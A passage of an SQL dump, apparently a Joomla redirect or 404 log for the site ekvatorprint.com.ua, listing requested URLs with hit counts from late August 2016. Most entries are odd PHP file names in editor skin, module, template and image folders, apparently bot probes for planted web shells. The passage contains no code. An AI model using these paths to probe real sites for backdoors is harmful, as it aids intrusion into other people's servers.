00:00:00',301),(1777,'http://ekvatorprint.com.ua/libraries/phputf8/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/libraries/phputf8/wp-xmlrpc.php','',3,0,'2016-08-28 11:18:11','0000-00-00 00:00:00',301),(1778,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/class.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/class.php','',3,0,'2016-08-28 11:18:11','0000-00-00 00:00:00',301),(1779,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/highcontrast/pages.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/highcontrast/pages.php','',4,0,'2016-08-28 11:18:37','0000-00-00 00:00:00',301),(1780,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/miles.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/miles.php','',3,0,'2016-08-28 11:18:37','0000-00-00 00:00:00',301),(1781,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/class.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/class.php','',3,0,'2016-08-28 11:18:37','0000-00-00 00:00:00',301),(1782,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/style.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/style.php','',4,0,'2016-08-28 11:18:37','0000-00-00 00:00:00',301),(1783,'http://ekvatorprint.com.ua/modules/config/config.php',NULL,'http://ekvatorprint.com.ua/modules/config/config.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1784,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/dispatcher.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/dispatcher.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1785,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/page.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/page.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1786,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/class.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/class.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1787,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/dispatcher.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/dispatcher.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1788,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/uplo.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/uplo.php','',5,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1789,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/main.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/main.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1790,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/pages.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/pages.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1791,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/class.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/class.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1792,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/uplo.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/uplo.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1793,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/pages.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/pages.php','',3,0,'2016-08-28 11:18:38','0000-00-00 00:00:00',301),(1794,'http://ekvatorprint.com.ua/modules/mod_design/mod_avm.php',NULL,'http://ekvatorprint.com.ua/modules/mod_design/mod_avm.php','',3,0,'2016-08-28 11:19:04','0000-00-00 00:00:00',301),(1795,'http://ekvatorprint.com.ua/modules/mod_backup2/mod_backup2.php',NULL,'http://ekvatorprint.com.ua/modules/mod_backup2/mod_backup2.php','',5,0,'2016-08-28 11:19:04','0000-00-00 00:00:00',301),(1796,'http://ekvatorprint.com.ua/modules/mod_system/func.php',NULL,'http://ekvatorprint.com.ua/modules/mod_system/func.php','',3,0,'2016-08-28 11:19:04','0000-00-00 00:00:00',301),(1797,'http://ekvatorprint.com.ua/modules/mod_articles1/mod_articles1.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles1/mod_articles1.php','',3,0,'2016-08-28 11:19:04','0000-00-00 00:00:00',301),(1798,'http://ekvatorprint.com.ua/modules/mod_araticlws/system_ml.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlws/system_ml.php','',4,0,'2016-08-28 11:19:05','0000-00-00 00:00:00',301),(1799,'http://ekvatorprint.com.ua/modules/mod_araticlhess/patch.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlhess/patch.php','',4,0,'2016-08-28 11:19:05','0000-00-00 00:00:00',301),(1800,'http://ekvatorprint.com.ua/modules/mod_articless/patch.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/patch.php','',4,0,'2016-08-28 11:19:05','0000-00-00 00:00:00',301),(1801,'http://ekvatorprint.com.ua/modules/mod_system/system.php',NULL,'http://ekvatorprint.com.ua/modules/mod_system/system.php','',3,0,'2016-08-28 11:19:05','0000-00-00 00:00:00',301),(1802,'http://ekvatorprint.com.ua/modules/mod_design/mod_design.php',NULL,'http://ekvatorprint.com.ua/modules/mod_design/mod_design.php','',3,0,'2016-08-28 11:19:05','0000-00-00 00:00:00',301),(1803,'http://ekvatorprint.com.ua/modules/mod_banned/mod_banned.php',NULL,'http://ekvatorprint.com.ua/modules/mod_banned/mod_banned.php','',3,0,'2016-08-28 11:19:06','0000-00-00 00:00:00',301),(1804,'http://ekvatorprint.com.ua/modules/mod_araticclhess/mod_araticclhess.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticclhess/mod_araticclhess.php','',5,0,'2016-08-28 11:19:06','0000-00-00 00:00:00',301),(1805,'http://ekvatorprint.com.ua/modules/mod_articles_archive/wp-xmlrpc.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_archive/wp-xmlrpc.php','',3,0,'2016-08-28 11:19:06','0000-00-00 00:00:00',301),(1806,'http://ekvatorprint.com.ua/modules/mod_design1/mod_design1.php',NULL,'http://ekvatorprint.com.ua/modules/mod_design1/mod_design1.php','',3,0,'2016-08-28 11:19:06','0000-00-00 00:00:00',301),(1807,'http://ekvatorprint.com.ua/modules/mod_fxprev/html.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/html.php','',3,0,'2016-08-28 11:19:06','0000-00-00 00:00:00',301),(1808,'http://ekvatorprint.com.ua/modules/mod_search/tmpl/newfile.php',NULL,'http://ekvatorprint.com.ua/modules/mod_search/tmpl/newfile.php','',7,0,'2016-08-28 11:19:06','0000-00-00 00:00:00',301),(1809,'http://ekvatorprint.com.ua/tmp/secure.php',NULL,'http://ekvatorprint.com.ua/tmp/secure.php','',3,0,'2016-08-28 11:19:32','0000-00-00 00:00:00',301),(1810,'http://ekvatorprint.com.ua/plugins/content/pagenavigation/paginat.php',NULL,'http://ekvatorprint.com.ua/plugins/content/pagenavigation/paginat.php','',3,0,'2016-08-28 11:19:32','0000-00-00 00:00:00',301),(1811,'http://ekvatorprint.com.ua/templates/atomic/mainik.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/mainik.php','',3,0,'2016-08-28 11:19:32','0000-00-00 00:00:00',301),(1812,'http://ekvatorprint.com.ua/plugins/content/mod_xsystem/mod_xsystem.php',NULL,'http://ekvatorprint.com.ua/plugins/content/mod_xsystem/mod_xsystem.php','',3,0,'2016-08-28 11:19:32','0000-00-00 00:00:00',301),(1813,'http://ekvatorprint.com.ua/tmp/init_h.php',NULL,'http://ekvatorprint.com.ua/tmp/init_h.php','',3,0,'2016-08-28 11:19:32','0000-00-00 00:00:00',301),(1814,'http://ekvatorprint.com.ua/modules/mod_xcache/mod_xcache.php',NULL,'http://ekvatorprint.com.ua/modules/mod_xcache/mod_xcache.php','',3,0,'2016-08-28 11:19:33','0000-00-00 00:00:00',301),(1815,'http://ekvatorprint.com.ua/plugins/system/xml.php',NULL,'http://ekvatorprint.com.ua/plugins/system/xml.php','',4,0,'2016-08-28 11:19:33','0000-00-00 00:00:00',301),(1816,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/core.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/core.php','',3,0,'2016-08-28 11:19:33','0000-00-00 00:00:00',301),(1817,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/core.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/core.php','',4,0,'2016-08-28 11:19:34','0000-00-00 00:00:00',301),(1818,'http://ekvatorprint.com.ua/modules/mod_xsystemx/mod_xsystemx.php',NULL,'http://ekvatorprint.com.ua/modules/mod_xsystemx/mod_xsystemx.php','',3,0,'2016-08-28 11:19:34','0000-00-00 00:00:00',301),(1819,'http://ekvatorprint.com.ua/templates/atomic/stcchatcc.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/stcchatcc.php','',3,0,'2016-08-28 11:19:34','0000-00-00 00:00:00',301),(1820,'http://ekvatorprint.com.ua/modules/mod_systemzz/mod_systemzz.php',NULL,'http://ekvatorprint.com.ua/modules/mod_systemzz/mod_systemzz.php','',4,0,'2016-08-28 11:19:34','0000-00-00 00:00:00',301),(1821,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/voice.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/voice.php','',3,0,'2016-08-28 11:19:34','0000-00-00 00:00:00',301),(1822,'http://ekvatorprint.com.ua/templates/beez/html/com_weblinks/weblink/thumbs.php',NULL,'http://ekvatorprint.com.ua/templates/beez/html/com_weblinks/weblink/thumbs.php','',3,0,'2016-08-28 11:19:34','0000-00-00 00:00:00',301),(1823,'http://ekvatorprint.com.ua/templates/beez/html/com_user/login/thumbs.php',NULL,'http://ekvatorprint.com.ua/templates/beez/html/com_user/login/thumbs.php','',3,0,'2016-08-28 11:19:34','0000-00-00 00:00:00',301),(1824,'http://ekvatorprint.com.ua/components/index.php',NULL,'http://ekvatorprint.com.ua/components/index.php','',5,0,'2016-08-28 11:27:10','0000-00-00 00:00:00',301),(1825,'http://ekvatorprint.com.ua/images/joomla.php',NULL,'http://ekvatorprint.com.ua/images/joomla.php','',4,0,'2016-08-28 11:27:10','0000-00-00 00:00:00',301),(1826,'http://ekvatorprint.com.ua/images/config.php',NULL,'http://ekvatorprint.com.ua/images/config.php','',6,0,'2016-08-28 11:27:10','0000-00-00 00:00:00',301),(1827,'http://ekvatorprint.com.ua/components/com_acymailing/controllers/sys.php',NULL,'http://ekvatorprint.com.ua/components/com_acymailing/controllers/sys.php','',4,0,'2016-08-28 11:27:11','0000-00-00 00:00:00',301),(1828,'http://ekvatorprint.com.ua/components/com_content/contents.php',NULL,'http://ekvatorprint.com.ua/components/com_content/contents.php','',4,0,'2016-08-28 11:27:11','0000-00-00 00:00:00',301),(1829,'http://ekvatorprint.com.ua/modules/mod_securnet/mod_securnet.php',NULL,'http://ekvatorprint.com.ua/modules/mod_securnet/mod_securnet.php','',6,0,'2016-08-28 11:27:37','0000-00-00 00:00:00',301),(1830,'http://ekvatorprint.com.ua/images/mod.php',NULL,'http://ekvatorprint.com.ua/images/mod.php','',4,0,'2016-08-28 11:27:37','0000-00-00 00:00:00',301),(1831,'http://ekvatorprint.com.ua/modules/mod_media_style/mod_media_style.php',NULL,'http://ekvatorprint.com.ua/modules/mod_media_style/mod_media_style.php','',7,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1832,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/voice.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/voice.php','',5,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1833,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/uplo.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/uplo.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1834,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/mod_joomlasec.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/mod_joomlasec.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1835,'http://ekvatorprint.com.ua/plugins/search/libraries.php',NULL,'http://ekvatorprint.com.ua/plugins/search/libraries.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1836,'http://ekvatorprint.com.ua/images/js.php',NULL,'http://ekvatorprint.com.ua/images/js.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1837,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/voice.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/voice.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1838,'http://ekvatorprint.com.ua/modules/mod_stats/stats.php',NULL,'http://ekvatorprint.com.ua/modules/mod_stats/stats.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1839,'http://ekvatorprint.com.ua/images/pack.php',NULL,'http://ekvatorprint.com.ua/images/pack.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1840,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/search.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/search.php','',5,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1841,'http://ekvatorprint.com.ua/images/miles.php',NULL,'http://ekvatorprint.com.ua/images/miles.php','',4,0,'2016-08-28 11:27:38','0000-00-00 00:00:00',301),(1842,'http://ekvatorprint.com.ua/images/mod_config.php',NULL,'http://ekvatorprint.com.ua/images/mod_config.php','',7,0,'2016-08-28 11:27:39','0000-00-00 00:00:00',301),(1843,'http://ekvatorprint.com.ua/templates/atomic/system.php',NULL,'http://ekvatorprint.com.ua/templates/atomic/system.php','',8,0,'2016-08-28 11:28:06','0000-00-00 00:00:00',301),(1844,'http://ekvatorprint.com.ua/templates/system/404.php',NULL,'http://ekvatorprint.com.ua/templates/system/404.php','',4,0,'2016-08-28 11:28:07','0000-00-00 00:00:00',301),(1845,'http://ekvatorprint.com.ua/plugins/system/captcha/captcha.php',NULL,'http://ekvatorprint.com.ua/plugins/system/captcha/captcha.php','',6,0,'2016-08-28 11:28:07','0000-00-00 00:00:00',301),(1846,'http://ekvatorprint.com.ua/plugins/system/anticopy.php',NULL,'http://ekvatorprint.com.ua/plugins/system/anticopy.php','',6,0,'2016-08-28 11:28:08','0000-00-00 00:00:00',301),(1847,'http://ekvatorprint.com.ua/wp-content/plugins/1-flash-gallery/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/1-flash-gallery/readme.txt','',2,0,'2016-08-28 11:32:59','0000-00-00 00:00:00',301),(1848,'http://ekvatorprint.com.ua/index.php?view=article&id=18&Itemid=19',NULL,'','',1,0,'2016-08-29 08:05:57','0000-00-00 00:00:00',301),(1849,'http://ekvatorprint.com.ua/administrator/includes/search.php',NULL,'http://ekvatorprint.com.ua/administrator/includes/search.php','',5,0,'2016-08-29 09:20:44','0000-00-00 00:00:00',301),(1850,'http://ekvatorprint.com.ua/administrator/components/com_banners/banners.html.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/banners.html.php','',36,0,'2016-08-29 09:20:44','0000-00-00 00:00:00',301),(1851,'http://ekvatorprint.com.ua/administrator/components/com_admin/xfile.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/xfile.php','',3,0,'2016-08-29 09:20:44','0000-00-00 00:00:00',301),(1852,'http://ekvatorprint.com.ua/administrator/config.php',NULL,'http://ekvatorprint.com.ua/administrator/config.php','',4,0,'2016-08-29 09:20:44','0000-00-00 00:00:00',301),(1853,'http://ekvatorprint.com.ua/administrator/img.php',NULL,'http://ekvatorprint.com.ua/administrator/img.php','',5,0,'2016-08-29 09:20:44','0000-00-00 00:00:00',301),(1854,'http://ekvatorprint.com.ua/administrator/components/com_extplorer/libraries/geshi/geshi/autoit.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_extplorer/libraries/geshi/geshi/autoit.php','',3,0,'2016-08-29 09:20:44','0000-00-00 00:00:00',301),(1855,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/languages/thumbs.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/languages/thumbs.php','',3,0,'2016-08-29 09:20:45','0000-00-00 00:00:00',301),(1856,'http://ekvatorprint.com.ua/administrator/mod_xsystem.php',NULL,'http://ekvatorprint.com.ua/administrator/mod_xsystem.php','',5,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1857,'http://ekvatorprint.com.ua/administrator/xbczmsd.php',NULL,'http://ekvatorprint.com.ua/administrator/xbczmsd.php','',4,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1858,'http://ekvatorprint.com.ua/components/tmpl.php',NULL,'http://ekvatorprint.com.ua/components/tmpl.php','',5,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1859,'http://ekvatorprint.com.ua/components/com_user/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_user/views/index.php','',5,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1860,'http://ekvatorprint.com.ua/components/com_content/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/index.php','',5,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1861,'http://ekvatorprint.com.ua/components/com_contact/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/views/index.php','',5,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1862,'http://ekvatorprint.com.ua/components/com_system/tmpl/template.php',NULL,'http://ekvatorprint.com.ua/components/com_system/tmpl/template.php','',4,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1863,'http://ekvatorprint.com.ua/components/com_jce/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/views/index.php','',5,0,'2016-08-29 09:20:48','0000-00-00 00:00:00',301),(1864,'http://ekvatorprint.com.ua/components/com_weblinks/1/mysql.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/1/mysql.php','',3,0,'2016-08-29 09:20:49','0000-00-00 00:00:00',301),(1865,'http://ekvatorprint.com.ua/components/com_banners/models/sys.php',NULL,'http://ekvatorprint.com.ua/components/com_banners/models/sys.php','',3,0,'2016-08-29 09:20:49','0000-00-00 00:00:00',301),(1866,'http://ekvatorprint.com.ua/components/com_contact/com_contact.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/com_contact.php','',9,0,'2016-08-29 09:20:49','0000-00-00 00:00:00',301),(1867,'http://ekvatorprint.com.ua/components/com_weblinks/links.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/links.php','',10,0,'2016-08-29 09:20:49','0000-00-00 00:00:00',301),(1868,'http://ekvatorprint.com.ua/components/com_akeeba/controllers/sys.php',NULL,'http://ekvatorprint.com.ua/components/com_akeeba/controllers/sys.php','',3,0,'2016-08-29 09:20:49','0000-00-00 00:00:00',301),(1869,'http://ekvatorprint.com.ua/components/com_search/views/search/index.php',NULL,'http://ekvatorprint.com.ua/components/com_search/views/search/index.php','',6,0,'2016-08-29 09:20:49','0000-00-00 00:00:00',301),(1870,'http://ekvatorprint.com.ua/components/com_weblinks/models/index.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/models/index.php','',6,0,'2016-08-29 09:20:49','0000-00-00 00:00:00',301),(1871,'http://ekvatorprint.com.ua/images/simple.php',NULL,'http://ekvatorprint.com.ua/images/simple.php','',7,0,'2016-08-29 09:21:08','0000-00-00 00:00:00',301),(1872,'http://ekvatorprint.com.ua/images/logs.php',NULL,'http://ekvatorprint.com.ua/images/logs.php','',6,0,'2016-08-29 09:21:09','0000-00-00 00:00:00',301),(1873,'http://ekvatorprint.com.ua/images/inc.php',NULL,'http://ekvatorprint.com.ua/images/inc.php','',4,0,'2016-08-29 09:21:09','0000-00-00 00:00:00',301),(1874,'http://ekvatorprint.com.ua/images/index.php',NULL,'http://ekvatorprint.com.ua/images/index.php','',7,0,'2016-08-29 09:21:09','0000-00-00 00:00:00',301),(1875,'http://ekvatorprint.com.ua/images/plagmain.php',NULL,'http://ekvatorprint.com.ua/images/plagmain.php','',3,0,'2016-08-29 09:21:09','0000-00-00 00:00:00',301),(1876,'http://ekvatorprint.com.ua/images/temp.php.',NULL,'http://ekvatorprint.com.ua/images/temp.php.','',11,0,'2016-08-29 09:21:09','0000-00-00 00:00:00',301),(1877,'http://ekvatorprint.com.ua/images/stcchatcc.php',NULL,'http://ekvatorprint.com.ua/images/stcchatcc.php','',4,0,'2016-08-29 09:21:10','0000-00-00 00:00:00',301),(1878,'http://ekvatorprint.com.ua/language/includes.php',NULL,'http://ekvatorprint.com.ua/language/includes.php','',7,0,'2016-08-29 09:21:10','0000-00-00 00:00:00',301),(1879,'http://ekvatorprint.com.ua/includes/widget.php',NULL,'http://ekvatorprint.com.ua/includes/widget.php','',6,0,'2016-08-29 09:21:10','0000-00-00 00:00:00',301),(1880,'http://ekvatorprint.com.ua/images/tmp.php',NULL,'http://ekvatorprint.com.ua/images/tmp.php','',5,0,'2016-08-29 09:21:10','0000-00-00 00:00:00',301),(1881,'http://ekvatorprint.com.ua/images/gallery.php',NULL,'http://ekvatorprint.com.ua/images/gallery.php','',7,0,'2016-08-29 09:21:10','0000-00-00 00:00:00',301),(1882,'http://ekvatorprint.com.ua/images/shwso.php',NULL,'http://ekvatorprint.com.ua/images/shwso.php','',6,0,'2016-08-29 09:21:10','0000-00-00 00:00:00',301),(1883,'http://ekvatorprint.com.ua/images/mainik.php',NULL,'http://ekvatorprint.com.ua/images/mainik.php','',3,0,'2016-08-29 09:21:11','0000-00-00 00:00:00',301),(1884,'http://ekvatorprint.com.ua/logs/logs.php',NULL,'http://ekvatorprint.com.ua/logs/logs.php','',8,0,'2016-08-29 09:21:29','0000-00-00 00:00:00',301),(1885,'http://ekvatorprint.com.ua/libraries/libraries.php',NULL,'http://ekvatorprint.com.ua/libraries/libraries.php','',5,0,'2016-08-29 09:21:30','0000-00-00 00:00:00',301),(1886,'http://ekvatorprint.com.ua/libraries/cms/model/model.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/model/model.php','',5,0,'2016-08-29 09:21:30','0000-00-00 00:00:00',301),(1887,'http://ekvatorprint.com.ua/libraries/joomla/user/newfile.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/user/newfile.php','',4,0,'2016-08-29 09:21:30','0000-00-00 00:00:00',301),(1888,'http://ekvatorprint.com.ua/libraries/joomla/crypt/keys.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/crypt/keys.php','',5,0,'2016-08-29 09:21:30','0000-00-00 00:00:00',301),(1889,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/sys.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/sys.php','',3,0,'2016-08-29 09:21:31','0000-00-00 00:00:00',301),(1890,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/en.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/en.php','',4,0,'2016-08-29 09:21:31','0000-00-00 00:00:00',301),(1891,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/en.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/en.php','',4,0,'2016-08-29 09:21:31','0000-00-00 00:00:00',301),(1892,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/voice.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/voice.php','',4,0,'2016-08-29 09:21:31','0000-00-00 00:00:00',301),(1893,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/core.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/core.php','',3,0,'2016-08-29 09:21:31','0000-00-00 00:00:00',301),(1894,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/core.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/core.php','',3,0,'2016-08-29 09:21:32','0000-00-00 00:00:00',301),(1895,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/sys.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/sys.php','',3,0,'2016-08-29 09:21:32','0000-00-00 00:00:00',301),(1896,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/ppl.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/ppl.php','',3,0,'2016-08-29 09:21:32','0000-00-00 00:00:00',301),(1897,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/mod_joomlasec.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/mod_joomlasec.php','',3,0,'2016-08-29 09:21:32','0000-00-00 00:00:00',301),(1898,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php','',6,0,'2016-08-29 09:21:32','0000-00-00 00:00:00',301),(1899,'http://ekvatorprint.com.ua/media/sysm.php',NULL,'http://ekvatorprint.com.ua/media/sysm.php','',3,0,'2016-08-29 09:22:31','0000-00-00 00:00:00',301),(1900,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/sys.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/sys.php','',3,0,'2016-08-29 09:22:31','0000-00-00 00:00:00',301),(1901,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/mod_joomlasec.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/mod_joomlasec.php','',3,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1902,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/en.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/en.php','',3,0,'2016-08-29 09:22:32','0000-00-00 